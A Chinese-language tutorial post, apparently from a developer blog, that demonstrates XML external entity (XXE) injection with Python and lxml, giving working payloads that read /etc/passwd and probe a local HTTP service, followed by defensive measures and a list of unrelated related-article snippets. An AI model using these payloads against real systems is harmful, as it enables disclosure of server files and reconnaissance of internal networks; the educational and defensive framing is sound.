利用 XML 外部实体注入(XXE)读取文件和探测内部网络
利用 XML 外部实体注入(XXE)读取文件和探测内部网络
引言
XML 外部实体注入(XXE)是一种常见的安全漏洞,攻击者可以通过这种漏洞读取服务器上的文件或探测内部网络。本文将通过一个实际的 Python 代码示例,展示如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。
什么是 XXE?
XML 外部实体注入(XXE)是指在解析 XML 数据时,如果 XML 解析器启用了外部实体解析功能,攻击者可以注入恶意的 XML 实体来访问服务器上的敏感文件或发起网络请求。这种漏洞通常出现在使用 XML 解析库的应用程序中,特别是在未正确配置解析器的情况下。
代码示例
以下是一个 Python 代码示例,展示了如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。
from lxml import etree
import requests# XML payload to read /etc/passwd
x = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodcall><methodname>&xxe;</methodname>
</methodcall>
"""# XML payload to probe internal network (e.g., 127.0.0.1)
x1 = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://127.0.0.1:8000" >]>
<methodcall><methodname>&xxe;</methodname>
</methodcall>
"""def parse_xml(xml_bytes):try:# Parse the XML bytes with lxml, which supports external entitiesparser = etree.XMLParser(resolve_entities=True)root = etree.fromstring(xml_bytes, parser=parser)methodname = root.find('methodname').textprint(methodname)except Exception as e:print(f"Error: {e}")# Parse the first XML string
parse_xml(x)# Parse the second XML string
parse_xml(x1)
代码解析
-
XML Payload:
x和x1是两个字节字符串,分别包含外部实体&xxe;。x中的外部实体指向/etc/passwd文件。x1中的外部实体指向http://127.0.0.1:8000。
-
解析函数:
parse_xml函数使用lxml.etree.fromstring解析字节字符串,并打印<methodname>元素的内容。etree.XMLParser(resolve_entities=True)参数启用外部实体解析。
-
解析 XML 字符串:
- 调用
parse_xml(x)解析第一个 XML 字节字符串,读取/etc/passwd文件内容。 - 调用
parse_xml(x1)解析第二个 XML 字节字符串,探测http://127.0.0.1:8000的内容。
- 调用
运行结果
当运行上述代码时,如果成功读取到 /etc/passwd 文件,将会输出文件内容。如果成功探测到 http://127.0.0.1:8000,将会输出该 URL 的响应内容。
如何防御 XXE 漏洞
为了防止 XXE 漏洞,可以采取以下措施:
- 禁用外部实体解析:在解析 XML 时,禁用外部实体解析功能。例如,在
lxml中,可以使用etree.XMLParser(resolve_entities=False)。 - 使用安全的 XML 解析库:选择那些默认不解析外部实体的库。
- 输入验证:对用户输入进行严格的验证,确保输入的数据符合预期格式。
- 定期更新和打补丁:保持系统和库的最新状态,及时应用安全补丁。
结论
通过上述示例,我们可以看到 XXE 漏洞的潜在危害。了解这些漏洞并采取适当的防御措施对于保护应用程序的安全至关重要。希望本文能够帮助读者更好地理解 XXE 漏洞及其防范方法。
相关文章:
读取文件和探测内部网络)
利用 XML 外部实体注入(XXE)读取文件和探测内部网络
利用 XML 外部实体注入(XXE)读取文件和探测内部网络 引言 XML 外部实体注入(XXE)是一种常见的安全漏洞,攻击者可以通过这种漏洞读取服务器上的文件或探测内部网络。本文将通过一个实际的 Python 代码示例,…...
软件设计师“排序算法”真题考点分析——求三连
一、考点分值占比与趋势分析 综合知识题分值统计表 年份考题数量总分值分值占比考察重点2018222.67%时间复杂度/稳定性判断2019334.00%算法特性对比分析2020222.67%空间复杂度要求2021111.33%算法稳定性判断2022334.00%综合特性应用2023222.67%时间复杂度计算2024222.67%分治…...
Visual Studio 2019/2022:当前不会命中断点,还没有为该文档加载任何符号。
1、打开调试的模块窗口,该窗口一定要在调试状态下才会显示。 vs2019打开调试的模块窗口 2、Visual Studio 2019提示未使用调试信息生成二进制文件 未使用调试信息生成二进制文件 3、然后到debug目录下看下确实未生成CoreCms.Net.Web.WebApi.pdb文件。 那下面的…...
vue--ofd/pdf预览实现
背景 实现预览ofd/pdf超链接功能 业务实现 pdf的预览 实现方式: 直接使用 <iframe :src"${url}#navpanes0&toolbar0" /> 实现pdf的预览。 navpanes0 隐藏侧边栏toolbar0 隐藏顶部工具栏 使用pdf.js,代码先行: <tem…...
Python 爬虫之requests 模块的应用
requests 是用 python 语言编写的一个开源的HTTP库,可以通过 requests 库编写 python 代码发送网络请求,其简单易用,是编写爬虫程序时必知必会的一个模块。 requests 模块的作用 发送网络请求,获取响应数据。 中文文档…...
【MySQL】CRUD
CRUD 简介 CRUD是对数据库中的记录进行基本的增删改查操作 Create(创建)Retrieve(读取)Update(更新)Delete(删除) 一、新增(Create) 语法: I…...
Spring Boot微服务架构(三):Spring Initializr创建CRM项目
使用Spring Initializr创建CRM项目 一、创建项目前的准备 访问Spring Initializr网站: 打开浏览器访问 https://start.spring.io/或者直接使用IDE(如IntelliJ IDEA或Eclipse)内置的Spring Initializr功能 项目基本信息配置: Proj…...
【笔记】PyCharm 中创建Poetry解释器
#工作记录 在使用 PyCharm 进行 Python 项目开发时,为项目配置合适的 Python 解释器至关重要。Poetry 作为一款强大的依赖管理和打包工具,能帮助我们更便捷地管理项目的依赖项与虚拟环境。下面将详细记录在 PyCharm 中创建 Poetry 解释器的步骤。 前提条…...
SDL2常用函数SDL事件处理:SDL_Event|SDL_PollEvent
SDL_Event SDL_Event是个联合体,是SDL中所有事件处理的核心。 SDL_Event是SDL中使用的所有事件结构的并集。 只要知道了那个事件类型对应SDL_Event结构的那个成员,使用它是一个简单的事情。 下表罗列了所有SDL_Event的所有成员和对应类型。 Uint32typ…...
RAID技术全解析:从基础到实战应用指南
一、RAID核心概念与级别对比 1. RAID的核心目标 数据冗余:通过镜像或校验机制防止数据丢失。 性能提升:利用条带化技术实现并行读写。 存储扩展:聚合多块磁盘容量,突破单盘限制。 2. 常见RAID级别对比 RAID级别最小磁盘数容…...
word通配符表
目录 一、word查找栏代码&通配符一览表二、word替换栏代码&通配符一览表三、参考文献 一、word查找栏代码&通配符一览表 序号清除使用通配符复选框勾选使用通配符复选框特殊字符代码特殊字符代码or通配符1任意单个字符^?一个任意字符?2任意数字^#任意数字&#…...
python中的numpy(数组)
(0)numpy介绍 NumPy是Python中用于科学计算的基础库,提供高效的多维数组对象ndarray,支持向量化运算,能大幅提高数值计算效率。它集成了大量数学函数(如线性代数、傅里叶变换等),可…...
C++ 正则表达式简介
1. 正则表达式简介 正则表达式(Regular Expression,简称Regex)是一种用于匹配和处理文本的强大工具。它通过特定的符号组合形成匹配规则,常用于表单验证、文本搜索与替换、数据清洗等场景。 C11标准引入了 <regex> 头文件…...
iOS知识复习
block原理 OC block 是个结构体,内部有个一个结构体成员 专门保存 捕捉对象 Swift闭包 是个函数,捕获了全局上下文的常量或者变量 修改数组存储的内容,不需要加_block,修改数组对象本身时需要 weak原理 Weak 哈希表 (散列表&a…...
rce命令执行原理及靶场实战(详细)
2. 原理 在根源上应用系统从设计上要给用户提供一个指定的远程命令操作的接口。漏洞主要出现在常见的路由器、防火墙、入侵检测等设备的web管理界面上。在管理界面提供了一个ping服务。提交后,系统对该IP进行ping,并且返回结果。如果后台服务器并没有对…...
Fuzz 模糊测试篇JS 算法口令隐藏参数盲 Payload未知文件目录
1 、 Fuzz 是一种基于黑盒的自动化软件模糊测试技术 , 简单的说一种懒惰且暴力的技术融合了常见 的以及精心构建的数据文本进行网站、软件安全性测试。 2 、 Fuzz 的核心思想 : 口令 Fuzz( 弱口令 ) 目录 Fuzz( 漏洞点 ) 参数 Fuzz( 利用参数 ) PayloadFuzz(Bypass)…...
展示了一个三轴(X, Y, Z)坐标系!
等轴测投影”(isometric projection)风格的手绘风格三维图,即三条坐标轴(x₁, x₂, x₃)看起来彼此垂直、等角分布(通常是 120 夹角),它是常见于教材和数学书籍的 “假三维”表示法。…...
【b站计算机拓荒者】【2025】微信小程序开发教程 - chapter1 初识小程序 - 3项目目录结构4快速上手
3 项目目录结构 3.1 项目目录结构 3.1.1 目录介绍 # 1 项目主配置文件,在项目根路径下,控制整个项目的-app.js # 小程序入口文件,小程序启动,会执行此js-app.json # 小程序全局配置文件,配置小程序导航栏颜色等信息…...
LLM Tuning
Lora-Tuning 什么是Lora微调? LoRA(Low-Rank Adaptation) 是一种参数高效微调方法(PEFT, Parameter-Efficient Fine-Tuning),它通过引入低秩矩阵到预训练模型的权重变换中,实现无需大规模修改…...
云计算与大数据进阶 | 28、存储系统如何突破容量天花板?可扩展架构的核心技术与实践—— 分布式、弹性扩展、高可用的底层逻辑(下)
在上篇中,我们围绕存储系统可扩展架构详细探讨了基础技术原理与典型实践。然而,在实际应用场景中,存储系统面临的挑战远不止于此。随着数据规模呈指数级增长,业务需求日益复杂多变,存储系统还需不断优化升级࿰…...
)
SQL每日一练(3)
前言: 难得看到了套好题,没考我,呜呜,今日第三更! 原始表(ai生成) 1. 销售表(sales) 用途:记录每笔销售的产品 ID 及金额。 product_id(产品 …...
Axure高级交互设计:中继器嵌套动态面板实现超强体验感台账
亲爱的小伙伴,在您浏览之前,烦请关注一下,在此深表感谢!如有帮助请订阅专栏! Axure产品经理精品视频课已登录CSDN可点击学习https://edu.csdn.net/course/detail/40420 课程主题:中继器嵌套动态面板 主要内容:中继器内部嵌套动态面板,实现可移动式台账,增强数据表现…...
水利数据采集MCU水资源的智能守护者
水利数据采集仪MCU,堪称水资源的智能守护者,其重要性不言而喻。在水利工程建设和水资源管理领域,MCU数据采集仪扮演着不可或缺的角色。它通过高精度的传感器和先进的微控制器技术,实时监测和采集水流量、水位、水质等关键数据&…...
函数式编程思想详解
函数式编程思想详解 1. 核心概念 不可变数据 (Immutable Data) 数据一旦创建,不可修改。任何操作均生成新数据,而非修改原数据。 优点:避免副作用,提升并发安全,简化调试。 Java实现:使用final字段、不可变…...
SAP全面转向AI战略,S/4HANA悄然隐身
在2025年SAP Sapphire大会上,SAP首席执行官Christian Klein提出了一个雄心勃勃的愿景:让人工智能(AI)无处不在,推动企业数字化转型。SAP的AI战略核心是将AI深度融入其业务应用生态,包括推出全新版本的AI助手…...
origin绘图之【如何将横坐标/x设置为文字、字母形式】
在使用 Origin 进行科研绘图或数据可视化的过程中,我们常常会遇到这样一种需求:希望将横坐标(X轴)由默认的数字形式,改为字母(如 A、B、C……)或中文文字(如 一、二、三………...
工业智能网关建立烤漆设备故障预警及远程诊断系统
一、项目背景 烤漆房是汽车、机械、家具等工业领域广泛应用的设备,主要用于产品的表面涂装。传统的烤漆房控制柜采用本地控制方式,操作人员需在现场进行参数设置和设备控制,且存在设备智能化程度低、数据孤岛、设备维护成本高以及依靠传统人…...
生成的视频无法在浏览器展)
cv2.VideoWriter_fourcc(*‘mp4v‘)生成的视频无法在浏览器展
看这个博主的博客,跟我碰到的问题的一致,都是使用AVC1写视频时报编码器不存在的异常,手动编译opencv-python或者使用conda install -c conda-forge opencv安装依赖即可。 博主博客:Python OpenCV生成视频无法浏览器播放问题说明及…...
MySQL 8.0 OCP 1Z0-908 161-170题
Q161.Examine this command, which executes successfully: cluster.addInstance ( ‘:’,{recoveryMethod: ‘clone’ 1}) Which three statements are true? (Choose three.) A)The account used to perform this recovery needs the BACKUP_ ADMIN privilege. B)A target i…...
Kafka Streams 和 Apache Flink 的无状态流处理与有状态流处理
Kafka Streams 和 Apache Flink 与数据库和数据湖相比的无状态和有状态流处理的概念和优势。 在数据驱动的应用中,流处理的兴起改变了我们处理和操作数据的方式。虽然传统数据库、数据湖和数据仓库对于许多基于批处理的用例来说非常有效,但在要求低延迟…...